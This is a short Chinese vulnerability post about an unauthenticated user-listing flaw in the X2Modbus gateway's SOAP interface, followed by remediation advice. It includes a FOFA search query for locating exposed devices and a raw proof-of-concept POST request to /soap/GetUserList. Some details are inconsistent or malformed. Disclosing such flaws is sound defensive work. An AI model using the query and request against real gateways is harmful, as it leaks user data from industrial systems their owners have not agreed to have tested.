免責聲明:本號提供的網絡安全信息僅供參考,不構成專業建議。作者不對任何由于使用本文信息而導致的直接或間接損害承擔責任。如涉及侵權,請及時與我聯系,我將盡快處理并刪除相關內容。
漏洞描述
該漏洞的存在是由于'GetUser'接口在處理SOAP請求時,缺乏對請求的充分驗證和授權檢查,任何人都可以通過發送特定的SOAP請求,獲取系統中存在的用戶信息,攻擊者可以通過發送包含合法用戶憑據的SOAP請求,繞過身份驗證機制,直接獲取用戶數據。
漏洞再現
FOFA:server="SunFull-Webs"
在http://ip:898/login.html頁面抓包,在重放器使用下面的格式
POST /soap/GetUserList
HTTP/1.1?ip
Cookie: language=zh-cn; language=zh-cn; username=admin
Content-Length: 12
Connection: close
?
{"CmpWc":""}
?修復建議
對 GetUser 接口的輸入進行嚴格的驗證和過濾。確保輸入的用戶名和密碼符合預期的格式和長度,防止惡意用戶通過構造特殊字符或語句來獲取信息。
定期檢查迅饒科技官方網站或相關渠道,獲取 X2Modbus 網關的最新安全補丁,并及時應用到系統中。廠商通常會修復已知的漏洞,通過更新補丁可以有效地防止攻擊者利用這些漏洞進行信息泄露攻擊。
?